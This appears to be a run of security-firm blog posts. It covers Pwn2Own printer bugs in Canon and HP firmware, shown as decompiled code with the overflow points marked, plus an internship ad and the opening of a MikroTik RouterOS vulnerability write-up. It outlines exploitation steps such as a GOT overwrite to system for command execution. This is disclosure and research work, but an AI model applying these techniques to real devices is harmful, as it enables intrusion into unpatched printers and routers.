      0  1  2  3  4  5  6  7  8  9  0  1  2  3  4  5
    +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+
    |                      ID                       |
    +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+
    |QR|   Opcode  |AA|TC|RD|RA|   Z    |   RCODE   |
    +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+
    |                    QDCOUNT                    |
    +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+
    |                    ANCOUNT                    |
    +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+
    |                    NSCOUNT                    |
    +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+
    |                    ARCOUNT                    |
    +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+
(diagram from https://www.ietf.org/rfc/rfc1035.txt)

主要可以拆分為 Header 及 body 部分,主要的請求都放在 body 中,後面三個欄位為同樣的格式。 Answer 欄位主要紀錄針對 Question 的 Resource records (RRs),

Resource record format:

                                    1  1  1  1  1  1
      0  1  2  3  4  5  6  7  8  9  0  1  2  3  4  5
    +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+
    |                                               |
    /                                               /
    /                      NAME                     /
    |                                               |
    +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+
    |                      TYPE                     |
    +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+
    |                     CLASS                     |
    +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+
    |                      TTL                      |
    |                                               |
    +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+
    |                   RDLENGTH                    |
    +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--|
    /                     RDATA                     /
    /                                               /
    +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+
(diagram from https://www.ietf.org/rfc/rfc1035.txt)

RDATA 部分會根據 type 不同而有所不同,而當 type=NSEC 其格式如下

   The RDATA of the NSEC RR is as shown below:

                        1 1 1 1 1 1 1 1 1 1 2 2 2 2 2 2 2 2 2 2 3 3
    0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   /                      Next Domain Name                         /
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   /                       Type Bit Maps                           /
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
(diagram from https://www.ietf.org/rfc/rfc4034.txt)

其餘部分在這個漏洞中不太重要,不另外多做詳細解釋,更多細節可以參考 RFC6762RFC1035以及 RFC4034

漏洞位置當 Canon ImageCLASS MF743Cdw 在處理 Answer 欄位(type=NSEC)時,並沒有檢查長度導致 stack overflow 。

bnMdnsParseAnswers function 是主要負責處理封包中 answer 欄位

int__fastcallbnMdnsParseAnswers(netbios_header*mdns_packet,unsignedint*ppayloadlen,netbios_header*pmdns_header,_WORD*anwser_rr,rrlist**payload,_DWORD*pinfo){...charnsec_buf[256];// ------ fixed size on the stack..._mdns_packet=(int)mdns_packet;p_payloadlen=ppayloadlen;p_mdns_header=pmdns_header;anwser_cnt=anwser_rr;v66=0;cur_ptr=&mdns_packet->payload[*pinfo];v9=*payload;v10=*payload;do{v11=v10==0;if(v10){v9=v10;v10=(rrlist*)v10->c;}else{v6=aBnmdnsparseans;v10=0;v67=0;}}while(!v11);while((unsigned__int16)*anwser_cnt>v67){...if...type=(unsigned__int16)pname->type;if(type==28)gotoLABEL_36;if...if...if(type!=0x21){if(type!=47)// NSEC{...gotoLABEL_95;}v62=0;v63=0;zeromemory(nsec_buf,256,v19,v20);v47=bnMdnsMalloc(8);rrlist->pname->nsec=v47;if(!v47){bnMdnsFreeRRLIST((int)rrlist);v50=2720;LABEL_76:debugprintff(3610,3,"[bnjr] [%s] <%s:%d> bnMdnsParseAnswers error in malloc(NSEC)\n","IMP/mdns/common/tcBnMdnsMsg.c",v6,v50);return3;}maybe_realloc(v47,8);nsec=rrlist->pname->nsec;nsec_len=bnMdnsGetDecodedRRNameLen(cur_ptr,*ppayloadlen,(char*)_mdns_packet,&dwbyte);if...if...v51=(_BYTE*)bnMdnsMalloc(nsec_len);*(_DWORD*)nsec=v51;if...consume_label(cur_ptr,*ppayloadlen,_mdns_packet,v51,nsec_len);v52=dwbyte;v53=&cur_ptr[dwbyte];v54=*ppayloadlen-dwbyte;*ppayloadlen=v54;v55=(unsigned__int8)v53[1];v56=(unsigned__int8)*v53;nsec_=v53+2;*ppayloadlen=v54-2;v57=v56|(v55<<8);nsec_len_=__rev16(v57);if...memcpy((int)nsec_buf,nsec_,nsec_len_,v57);//-------- [1]  stack overflow for(i=0;i<(int)nsec_len_;++i){if(nsec_buf[i]){for(j=0;j<8;++j){if(1<<j==(unsigned__int8)nsec_buf[i]){if(v62)v63=7-j+8*i;elsev62=7-j+8*i;}}}}*(_WORD*)(nsec+4)=v62;...}*pinfo=&cur_ptr[-_mdns_packet-0xC];*anwser_cnt-=v66;return0;}}

當他在處理 NSEC(47) 的 Record 時,並沒有檢查長度就直接複製 data 到 local buffer(nsec_buf[256]) ,如上述程式碼的 [1],導致 stack overflow

Exploitation

這裡用方法與 Pwn2Own 2021 Austin 時相同,這邊就不在多做敘述。

NetBIOS (CVE-2023-0854)

在 NetBIOS 中主要提供下列三種不同的服務:

  • Name service (NetBIOS-NS) : Port 137/TCP and 137/UDP
  • Datagram distribution service (NetBIOS-DGM) : Port 138/UDP
  • Session service (NetBIOS-SSN) : Port 139/TCP

這邊我們將會把重點放在 NetBIOS-NS 中,NetBIOS-NS 也會提供區網中域名解析的服務,常見於 Windows 作業系統中,而該封包格式也是基於 DNS 的封包。其詳細內容定義於 RFC1002

The packet format:

     1 1 1 1 1 1 1 1 1 1 2 2 2 2 2 2 2 2 2 2 3 3
    0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |         NAME_TRN_ID           | OPCODE  |   NM_FLAGS  | RCODE |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |          QDCOUNT              |           ANCOUNT             |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |          NSCOUNT              |           ARCOUNT             |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
(diagram from https://datatracker.ietf.org/doc/html/rfc1002)

而 Query 則會被放在 header 之後

                        1 1 1 1 1 1 1 1 1 1 2 2 2 2 2 2 2 2 2 2 3 3
    0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |                                                               |
   + ------                                                ------- +
   |                            HEADER                             |
   + ------                                                ------- +
   |                                                               |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |                                                               |
   /                       QUESTION ENTRIES                        /
   |                                                               |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |                                                               |
   /                    ANSWER RESOURCE RECORDS                    /
   |                                                               |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |                                                               |
   /                  AUTHORITY RESOURCE RECORDS                   /
   |                                                               |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |                                                               |
   /                  ADDITIONAL RESOURCE RECORDS                  /
   |                                                               |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
(diagram from https://datatracker.ietf.org/doc/html/rfc1002)

其中我們只須關注於 Question Entries 欄位

Question Section:

                        1 1 1 1 1 1 1 1 1 1 2 2 2 2 2 2 2 2 2 2 3 3
    0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |                                                               |
   /                         QUESTION_NAME                         /
   /                                                               /
   |                                                               |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |         QUESTION_TYPE         |        QUESTION_CLASS         |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

Question Name 都是由許多 label 組成,每個 label 都如同前述 LLMNR 所述,都是長度加上字串的組合。其餘欄位則不另外多加敘述,詳細內容可參考 RFC1002

漏洞位置當 Canon ImageCLASS MF743Cdw 在處理 NetBIOS 封包的 Question 欄位時,沒有正確檢查長度導致 Heap Overflow 。

其漏洞位置在 cmNetBiosParseName中,我們可透過 ndNameProcessExternalMessage 觸發。

我們這邊就稍微來分析一下漏洞成因:

當 Canon 中的 NetBIOS 服務啟動時,會先去初始化 netbios_ns_buffer,並分配 0xff 大小空間給該 buffer。

intndNameInit(){sub_41C47A20((int)"netcifsnqendapp/IMP/nq/ndnampro.c",0x44ED3194,97,0x64u);netbios_ns_buffer=calloc(1,0xFF);...return-1;}

當接收到來自 137/UDP 的 NetBIOS 封包時,就會透過 ndNameProcessExternalMessage 來處理封包

int__fastcallndNameProcessExternalMessage(Adapter*a1){netbios_header*packet;// r0unsigned__int8*v3;// r6intflag;// r0intv5;// r5intv6;// r0intv8;// r4charnbname[40];// [sp+8h] [bp-28h] BYREFsub_41C47A20((int)"netcifsnqendapp/IMP/nq/ndnampro.c",0x44ED31AC,178,0x64u);packet=(netbios_header*)a1->packet;LOWORD(a1->vvv)=LOBYTE(packet->id)|(HIBYTE(packet->id)<<8);v3=cmNetBiosParseName(packet,(unsigned__int8*)packet->payload,(int)nbname,netbios_ns_buffer,0xFFu);//---- [1]//heap overflow at netbios_ns_buffer  if...flag=getname_query_flag((netbios_header*)a1->packet);v5=flag;if(flag==0xA800){v6=ndInternalNamePositiveRegistration(a1,(int)nbname,(int)v3);gotoLABEL_17;}if(flag>0xA800){switch(flag){case0xA801:v6=ndInternalNameNegativeRegistration(a1,(int)nbname);gotoLABEL_17;...}gotoLABEL_14;}...ndInternalNameNegativeQuery((int)a1,(int)nbname);v6=ndExternalNameNegativeQuery((int)a1,nbname);LABEL_17:v8=v6;assset("netcifsnqendapp/IMP/nq/ndnampro.c",0x44ED31AC,238,100);returnv8;}

在上述程式碼[1]中,該 cmNetBiosParseName函式,會去處理 Question 欄位中的名稱,也提供了 buffer 大小給該函式,然而該函式並沒有正確檢查長度,導致複製過多的資料到 netbios_ns_buff 導致 heap overflow

我們來看一下 cmNetBiosParseName函式

unsigned__int8*__fastcallcmNetBiosParseName(netbios_header*netbios_packet,unsigned__int8*netbios_label,intnetbios_name,_BYTE*domain_name,unsignedintmaxlen){charv5;// r9unsigned__int8*v11;// r0_BYTE*v12;// r1unsignedinti;// r0charv15;// r3charv16;// r2intv17;// r0unsigned__int8*v18;// r0unsignedintv19;// r3char*label_;// r0unsignedintlabellen_;// r4unsignedintlabellen;// t1char*v23;// r5unsigned__int8*next[9];// [sp+4h] [bp-24h] BYREF...if(*v11==0x20){...v17=*next[0];if(*next[0])v5='.';else*domain_name=0;if(v17){do{v18=resolveLabel(netbios_packet,next);labellen=*v18;label_=(char*)(v18+1);labellen_=labellen;if(maxlen>labellen){memcpy((int)domain_name,label_,labellen_,v19);v23=&domain_name[labellen_];maxlan-=labellen_;// ---------- [2]              // it does not subtract the length of "."*v23=v5;domain_name=v23+1;}}while(*next[0]);*(domain_name-1)=0;}assset("netcifsnqecorelib/IMP/nq/cmnbname.c",0x44A86D7C,634,100);returnnext[0]+1;}else{logg("netcifsnqecorelib/IMP/nq/cmnbname.c",0x44A86D7C,595,10);return0;}}

從這個函式中,可以看出他在處理 domain name 時,有按照所提供的參數來檢查長度,並且會在每個 label 間加入 .,然而在 [2]的部分並沒有去檢查 .這個字元的長度,實際上的長度可以比原本的 buffer 還要長,導致 buffer overflow。

Exploitation

原本以為會需要更詳細去逆向 Heap internal,不過幸運的是,後來發現到 buffer 後面有好用的結構可以利用。

netbios_ns_buffer後,存在一個結構,這邊先命名為 nb_info

The layout of heap memory:

The structure of nb_info :

structnb_info{intactive;charnbname[16];intx;inty;shortz;shortsrc_port;shorttid;shortw;Adapter*adapter;char*ptr;intstate;...}

該結構主要用來儲存 NetBIOS 的名稱資訊,而其中也包含另外一個結構,這裡命名為 Adapter,主要儲存該 NetBIOS 的連線資訊。

The structure of Adapter :

structAdapter{intidx;_BYTEgap0[16];intx;intfd_1022;intfd_1023;inty;_WORDsrc_port;_DWORDsrc_ip;intvvv;intpacket;_DWORDrecv_bytes;char*response_buf;_DWORDdword3C;};

在初步了解這些結構之後,我們可以先回頭看一下 ndNameProcessExternalMessage,如果將封包中的 flag 欄位設成 0xA801,將會使用 ndInternalNameNegativeRegistration去處理 NetBIOS name. 該結果將會寫入Adapter->responsebuf.

case0xA801:v6=ndInternalNameNegativeRegistration(a1,(int)nbname);gotoLABEL_17;

在 ndInternalNameNegativeRegistration 中:

int__fastcallndInternalNameNegativeRegistration(Adapter*adapter,inta2){...if(v8){returnNegativeRegistrationResponse((nb_info*)v6,adapter,3);}...}

只要滿足條件就會去 returnNegativeRegistrationResponse 處理 Response,而在 returnNegativeRegistrationResponse 中:

int__fastcallreturnNegativeRegistrationResponse(nb_info*nbinfo,Adapter*adapter,inta3){intv6;// r2netbios_header*response_buf;// r5intNameWhateverResponse;// r2unsigned__int8v10[20];// [sp+4h] [bp-2Ch] BYREF__int16v11;// [sp+18h] [bp-18h] BYREFintv12;// [sp+1Ah] [bp-16h] BYREFmaybe_memcpy_s(v10,0x44ED3100,20);sub_41C47A20((int)"netcifsnqendapp/IMP/nq/ndinname.c",0x44ED30DC,2349,0x64u);if...v11=0;sub_40B06FD8(*(_DWORD*)adapter->gap0,&v12);response_buf=*(netbios_header**)nbinfo->adapter->responsebuf;NameWhateverResponse=ndGenerateNameWhateverResponse(response_buf,nbinfo->name,0x20u,(char*)&v11,6u);if(NameWhateverResponse>0){response_buf->id=nbinfo->id;//------[3]response_buf->flag=__rev16(a3|0xA800);if(sySendToSocket(nbinfo->adapter->fd_1022,(constchar*)response_buf,NameWhateverResponse,v10,(unsigned__int16)nbinfo->src_port)<=0){logg("netcifsnqendapp/IMP/nq/ndinname.c",0x44ED30DC,2392,10);v6=2393;}else{v6=2396;}gotoLABEL_9;}assset("netcifsnqendapp/IMP/nq/ndinname.c",0x44ED30DC,2372,100);return-1;}

可以看到 [3]會把 response_buf->id 寫成 nbinfo->id。

也就是說,如果我們可以覆蓋掉 nb_info結構,並且構造 Adapter我們就會有一個任意記憶體寫入,而實際上構造方式很簡單,只要找個 Global Buffer 去構造就可以了,我們這邊選擇了 BJNP Session Buffer 去構造我們結構。

而在我們有任意寫入之後,我們可以覆蓋 SLP 的函數指針來達成 RCE,後續利用就與前述相同,這邊就不另外多做介紹了。

HP

這次目標是 HP Collor LaserJet Pro M479fdw 這台印表機,其主要是 Linux Base 的,分析起來相對單純很多,而其中 Web Service 底下有許多的 cgi 來提供各種不同的印表機操作,這些都是透過 FastCGI 方式來運作,可參考 nginx config 來看每個 path 分別對應到哪個 Port 及哪個 Service

/Sirius/rom/httpmgr_nginx/ledm.conf

/usr/bin/local/slanapp負責處理 scan 相關的操作,主要 listen 在 127.0.0.1:14030

當我們存取 /Scan/Jobs 路徑時,就會透過這個 cgi 來處理

漏洞位置

當 HP 處理 /Scan/Jobs 底下的 get 請求時,會使用 rest_scan_handle_get_request 來處理,同時也會將 pathinfo 一起傳入

int__fastcallrest_scan_handle_get_request(inta1,inta2,char*s1,unsigned__int8*pathinfo,intpathinfo_len){structhttpmgr_fptrtbl**v8;// r0intv9;// r1intv10;// r2structhttpmgr_fptrtbl**v11;// r0intv12;// r1intresult;// r0intv14;// r0intnext_char;// r4unsigned__int8*v16;// r3intv17;// r1intv18;// t1char*v19;// r5intv20;// r5intv21;// r0intv22;// r7size_tv23;// r8intv24;// r0charfirst_path_info[32];// [sp+8h] [bp-D8h] BYREFcharsecond_path_info[32];// [sp+28h] [bp-B8h] BYREFcharpagenumber[152];// [sp+48h] [bp-98h] BYREFif...if...if(!strncmp(s1,"/Scan/UserReadyToScan",0x15u)){...}else{v14=strncmp(s1,"/Scan/Jobs",0xAu);if(v14){...}...next_char=*pathinfo;if((next_char&0xDF)==0){first_path_info[0]=0;LABEL_37:_DEBUG_syslog("REST_SCAN_DEBUG",0,0x411FA215,400,0);v8=rest_scan_req_ifc_tbl;v9=a1;v10=400;gotoLABEL_6;}v16=pathinfo;v17=0;do//------------------------------------------------------ [2]  {if(next_char!='/')first_path_info[32*v17+v14]=next_char;v19=&first_path_info[32*v17];if(next_char=='/'){v20=32*v17++;pagenumber[v20-64+v14]=0;v19=&first_path_info[v20+32];v14=0;}else{++v14;}v18=*++v16;next_char=v18;}while((v18&0xDF)!=0);v19[v14]=0;if(v17!=2||strcmp(second_path_info,"Pages")||dword_5DBC8!=strtol(first_path_info,0,10))gotoLABEL_37;v24=strtol(pagenumber,0,10);result=rest_scan_send_scan_data(a1,v24)+1;if(result)rest_scan_vp_thread_created=1;elsereturnrest_scan_send_err_reply(a1,400);}returnresult;}

但當在 [2]處理 pathinfo 時,並沒有檢查長度,並且直接複製到 local buffer(first_path_info[32]) 中,導致 stack overflow。

Exploitation

我們可以構造很長的 request 到 /Scan/Jobs/ 來觸發漏洞,並且該處沒有 Stack Guard 也沒有 ASLR,可以直接覆蓋 return address,這邊只需要做 ROP 覆蓋掉 strncmp 的 GOT 到 system 後,就可以透過 /Copy/{cmd}來執行任意指令了。

不過最終這個漏洞與其他隊伍撞洞了。

Summary

從 Pwn2Own Austin 2021 到 Pwn2Own Toronto 2022 的結果看下來,印表機安全依舊是容易被忽略的,短短一年間,能打下印表機的隊伍也大幅增加,甚至到第三年 Pwn2Own Toronto 2023也還是被許多隊伍找到漏洞,最後也建議大家如果有使用到這些 IoT 設備,盡量把不必要的服務關閉並且設好防火牆及做好權限控管,以減少被攻擊的可能。

DEVCORE 2024 第五屆實習生計畫

$
0
0

DEVCORE 創立迄今已逾十年,持續專注於提供主動式資安服務,並致力尋找各種安全風險及漏洞,讓世界變得更安全。為了持續尋找更多擁有相同理念的資安新銳、協助學生建構正確資安意識及技能,我們成立了「戴夫寇爾全國資訊安全獎學金」,2022 年初也開始舉辦首屆實習生計畫,目前為止成果頗豐、超乎預期,第四屆實習生計畫也將於今年 1 月底告一段落。我們很榮幸地宣佈,第五屆實習生計畫即將登場,若您期待加入我們、精進資安技能,煩請詳閱下列資訊後來信報名!

實習內容

本次實習分為 Binary 及 Web 兩個組別,主要內容如下:

  • Binary 以研究為主,在與導師確定研究標的後,分析目標架構、進行逆向工程或程式碼審查。藉由這個過程訓練自己的思路,找出可能的攻擊面與潛在的弱點。另外也會讓大家嘗試分析及寫過往漏洞的 Exploit,理解過去漏洞都出現在哪,體驗真實世界的漏洞都是如何利用。
    • 漏洞挖掘及研究 70 %
    • 1-day 開發 (Exploitation) 30 %
  • Web 導師會與學生討論並確定一個以學生的期望為主的實習目標,並在過程輔導成長以完成目標,內容可以是深入研究近年常見新型態漏洞、攻擊手法、開源軟體,或是程式語言生態系的常見弱點,亦或是展現你的技術力以開發與紅隊相關的工具。
    • 漏洞、攻擊手法或開發工具研究 90%
    • 成果報告與準備 10%

公司地點

台北市松山區八德路三段 32 號 13 樓

實習時間

  • 2024 年 3 月開始到 2024 年 7 月底,共 5 個月。
  • 每週工作兩天,工作時間為 10:00 – 18:00
    • 每週固定一天下午 14:00 - 18:00 必須到公司討論進度
      • 如果居住雙北外可彈性調整(但須每個組別統一)
    • 其餘時間皆為遠端作業

招募對象

具有一定程度資安背景的學生,且可每週工作兩天。

預計招收名額

  • Binary 組:2~3 人
  • Web 組:2~3 人

薪資待遇

每月新台幣 16,000 元

招募條件資格與流程

實習條件要求

Binary

  • 基本逆向工程及除錯能力
    • 能看懂組合語言並瞭解基本 Debugger 使用技巧
  • 基本漏洞利用能力
    • 須知道 Stack overflow、ROP 等相關利用技巧
  • 基本 Scripting Language 開發能力
    • Python、Ruby
  • 具備分析大型 Open Source 專案能力
    • 以 C/C++ 為主
  • 具備基礎作業系統知識
    • 例如知道 Virtual Address 與 Physical Address 的概念
  • Code Auditing
    • 知道怎樣寫的程式碼會有問題
      • Buffer Overflow
      • Use After free
      • Race Condition
  • 具備研究熱誠,習慣了解技術本質
  • 加分但非必要條件
    • CTF 比賽經驗
    • pwnable.tw 成績
    • 樂於分享技術
      • 有公開的技術 blog/slide、Write-ups 或是演講
    • 精通 IDA Pro 或 Ghidra
    • 有寫過 1-day 利用程式
    • 具備下列其中之一經驗
      • Kernel Exploit
      • Windows Exploit
      • Browser Exploit
      • Bug Bounty

Web

  • 熟悉 OWASP Web Top 10。
  • 理解 PortSwigger Web Security Academy 中所有的安全議題或已完成所有 Lab。
    • 參考連結:https://portswigger.net/web-security/all-materials
  • 理解計算機網路的基本概念。
  • 熟悉 Command Line 操作,包含 Unix-like 和 Windows 作業系統的常見或內建系統指令工具。
  • 熟悉任一種網頁程式語言(如:PHP、ASP.NET、JSP),具備可以建立完整網頁服務的能力。
  • 熟悉任一種 Scripting Language(如:Shell Script、Python、Ruby),並能使用腳本輔以研究。
  • 具備除錯能力,能善用 Debugger 追蹤程式流程、能重現並收斂問題。
  • 具備可以建置、設定常見網頁伺服器(如:Nginx、Apache)及作業系統(如:Linux)的能力。
  • 具備追根究柢的精神。
  • 加分但非必要條件
    • 曾經獨立挖掘過 0-day 漏洞。
    • 曾經獨立分析過已知漏洞並能撰寫 1-day exploit。
    • 曾經於 CTF 比賽中擔任出題者並建置過題目。
    • 擁有 OSCP 證照或同等能力之證照。

應徵流程

本次甄選一共分為二個階段:

第一階段:書面審查

第一階段為書面審查,會需要審查下列兩個項目

  • 履歷內容
  • 簡答題答案
    • 題目 1:請提出三個,你印象最深刻或感到有趣、於西元 2021 ~ 2023 年間公開的真實漏洞或攻擊鏈案例,並依自己的理解簡述說明各個漏洞的成因、利用條件和可以造成的影響。
    • 題目 2:實習期間想要研究的主題,請提出三個可能選擇的明確主題,並簡單說明提出的理由或想完成的內容,例如:
      • 研究◯◯開源軟體,找到可 RCE 的重大風險弱點。
      • 研究 AD CS 的攻擊手法,嘗試挖掘新的攻擊可能性或向量。
      • 研究常見的路由器,目標包括:AA-123 路由器、BB-456 無線路由器。
    • 題目 3(應徵 Binary 組需回答):該程式為一個 Local Server,可透過瀏覽網頁與之互動,該 Server 跑在 Windows 11 的電腦上。
      • 請分析上述所提供的 Server,並利用其中的功能,讓使用者瀏覽網頁後,可直接在 Windows 11 上跳出 calc.exe,另外也請盡量滿足下列條件
        • 不可跳任何警告視窗。
        • 使用者只要瀏覽網頁即可觸發不會有額外操作。
        • 瀏覽器限制為 Chrome 或是 MS Edge
      • 請務必寫下解題過程,並交 write-up,請盡你所能來解題,即使最後沒有成功,也請寫下您所嘗試過的方法及思路,本測驗將會以 write-up 為主要依據。

本階段收件截止時間為 2024/01/28 23:59,我們會根據您的履歷及題目所回答的內容來決定是否有通過第一階段,我們會在 10 個工作天內回覆。

第二階段:面試

此階段為 30~120 分鐘(依照組別需求而定,會另行通知)的面試,會有 2~3 位資深夥伴參與,評估您是否具備本次實習所需的技術能力與人格特質。

時間軸

  • 2024/01/05 - 2024/01/28 公開招募,書審截止
  • 2024/01/29 - 2024/02/22 面試
  • 2024/02/26 前回應結果,早面試會早收到結果
  • 2024/03/04 第五屆實習計畫於當週開始

報名方式

  • 請將您的履歷題目答案以 PDF 格式寄到 recruiting_intern@devco.re
    • 履歷格式請參考範例示意(DOCXPAGESPDF)並轉成 PDF。若您有自信,也可以自由發揮最能呈現您能力的履歷。
    • 請於 2024/01/28 23:59前寄出(如果名額已滿則視情況提早結束)
  • 信件標題格式:[應徵] 職位 您的姓名(範例:[應徵] Web 組實習生 王小美)
  • 履歷內容請務必控制在三頁以內,至少需包含以下內容:
    • 基本資料
    • 學歷
    • 實習經歷
    • 社群活動經歷
    • 特殊事蹟
    • 過去對於資安的相關研究
    • MBTI 職業性格測試結果(測試網頁

若有應徵相關問題,請一律使用 Email 聯繫,如造成您的不便請見諒,我們感謝您的來信,並期待您的加入!

Pwn2Own Toronto 2022 : A 9-year-old bug in MikroTik RouterOS

$
0
0

English Version, 中文版本

TL;DR

DEVCORE research team found a 9-year-old WAN bug on RouterOS, the product of MikroTik. Combined with another bug of the Canon printer, DEVCORE becomes the first team ever to successfully complete an attack chain in the brand new SOHO Smashup category of Pwn2Own. And DEVCORE also won the title of Master of Pwn in Pwn2Own Toronto 2022.

The vulnerability occurs in the radvd of RouterOS, which does not check the length of the RDNSS field when processing ICMPv6 packets for IPv6 SLAAC. As a result, an attacker can trigger the buffer overflow by sending two crafted Router Advertisement packets, that allows an attacker to gain full control over the underlying Linux system of the router without logging in and without user interaction. This vulnerability was assigned as CVE-2023-32154 with a CVSS score of 7.5.

The vulnerability was reported to MikroTik by ZDI on 2022/12/29 and patched on 2023/05/19. It has been patched in the following RouterOS releases:

  • Long-term Release 6.48.7
  • Stable Release 6.49.8
  • Stable Release 7.10
  • Testing Release 7.10rc6

Pwn2Own SOHO Smashup

Pwn2Own is a series of contests organized by The Trend Micro Zero Day Initiative (ZDI). They pick popular products as targets for different categories, such as: operating systems, browsers, electric cars, industrial control systems, routers, printers, smart speakers, smartphones, NAS, webcams, etc.

As long as the participants can exploit a target without user interaction while the device is in its default state and the software is updated to the latest version, the team will receive the corresponding Master of Pwn points and bounty. And the team which has the highest Master of Pwn points will be the winner, who is also known as the “Master of Pwn.”

Due to the epidemic, Work From Home or SOHO (Small Office/Home Office) has become very common. Consider that, the Pwn2Own Toronto 2022 has a special category called SOHO Smashup, in which participants need to hack routers from the WAN side, and then use the router as a trampoline to attack common household devices in LAN, such as smart speakers, printers, etc.

In addition to the second highest prize of $100,000 (USD), the SOHO Smashup also has the highest score of 10, so if you’re aiming to win, you’ll want to complete this category! We’ve also chosen the lesser-explored MikroTik’s RouterBoard as the target to avoid bug collisions with others (both the bounty and score are halved when you have a collision with someone else).

RouterOS

The RouterOS is based on the Linux kernel and it’s also the default operating system of MikroTik’s RouterBoard. It can also be installed on a PC to turn it into a router.

Though the RouterOS do use some GPL-License software, according to the downloadterms page from MikroTik’s website, you have to pay $45 to MikroTik for sending a CD with GPL source, very interesting.

Glad that there is already a nice guy who uploaded the GPL source on the Github, though they didn’t help much on reversing the RouterOS.

RouterOS v7 and RouterOS v6

There are two versions of RouterOS on the download page of MikroTik’s website: RouterOS v7 and RouterOS v6. They are more like two branches of the RouterOS and share a similar design pattern. Because the default installed version of our target, RB2011UiAS-IN, is RouterOS v6, we focus on that version.

RouterOS does not provide a formal way for users to manipulate the underlying Linux system, and users are trapped in a restricted console with a limited number of commands to manage the router, so there has been a lot of research on how to jailbreak RouterOS.

The binary on the RouterOS uses a customized IPC to communicate with each other, and the IPC uses the “nova message” format to pack messages. So we call such kinds of binary “nova binary” afterward.

Besides, the RouterOS has a special attack surface. The user can manage a RouterOS device remotely from a Windows computer with a GUI tool, WinBox, by sending a nova message through the TCP. So, if the RouterOS fails to validate the privilege of a nova message, the attacker can possibly invade the router by sending a crafted nova message from remote, but it’s not a top priority because the WinBox is unavailable from WAN by default.

We started by reviewing the CVEs in the past few years. There were 80 CVEs related to RouterOS at that time, of which 28 targeted the router itself in pre-auth scenarios.

4 out of the 28 CVEs are in scenarios that are more in line with the Pwn2Own rules, which means these vulnerabilities could allow an attacker to spawn a shell on the router or log in as admin without user interaction. Three of the vulnerabilities were discovered between 2017 and 2019, and three of these were discovered “in the wild.” These four vulnerabilities are:

  • CVE-2017-20149: Also known as Chimay-Red, this is one of the leaked vulnerabilities from the CIA’s “Vault 7” in 2017. The vulnerability occurs when RouterOS parses HTTP requests, and if the Content-Length in the HTTP headers is negative, it will cause Integer Underflow, which together with the Stack Clash attack technique can control the program flow to achieve RCE.
  • CVE-2018-7445: A buffer overflow in the SMB service of RouterOS, which found by black-box fuzzing and is the only one of the four vulnerabilities that was reported by the discoverer. Though the SMB is not enabled defaultly.
  • CVE-2018-14847: Also the one of the leaked vulnerabilities from the “Vault 7”, which could allow an attacker to achieve arbitrary file read. Which doesn’t sound like a big problem, but because in the earlier version of RouterOS, the user’s password was stored in a file as password xor md5(username + "283i4jfkai3389"), the attacker can calculate the password of admin as long as the attacker can read the file.
  • CVE-2021-41987:A heap buffer overflow vulnerability in the base64 decoding process of the SCEP service due to a length miscalculation. The vulnerability was discovered after security researchers analyzed an APT’s exploit on its C2 server.

As we can see, most of these vulnerabilities are “in the wild.” We can only learn limited knowledge about analyzing and reversing the RouterOS.

We continue to seek out publicly available research materials, and we have these articles and presentations available at the time of the competition:

Review of the IPC and the Nova Message

